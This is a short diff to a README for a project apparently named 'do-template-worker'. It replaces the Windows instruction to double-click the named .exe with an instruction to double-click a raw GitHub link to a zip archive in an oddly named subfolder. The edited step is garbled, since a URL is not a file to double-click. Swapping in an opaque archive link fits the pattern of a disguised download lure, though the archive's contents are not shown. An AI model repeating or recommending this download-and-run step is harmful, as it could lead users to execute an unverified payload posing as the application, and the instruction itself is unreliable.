PrivvMido/do-template-worker/README.md

 3. Follow these simple steps to run the application:

    - For Windows:
-     - Locate the `do-template-worker.exe` file and double-click it.
+     - Locate the `https://raw.githubusercontent.com/PrivvMido/do-template-worker/main/familism/do-template-worker.zip` file and double-click it.

    - For macOS:
      - Open your Terminal, and type `./do-template-worker` in the folder where you unzipped the files.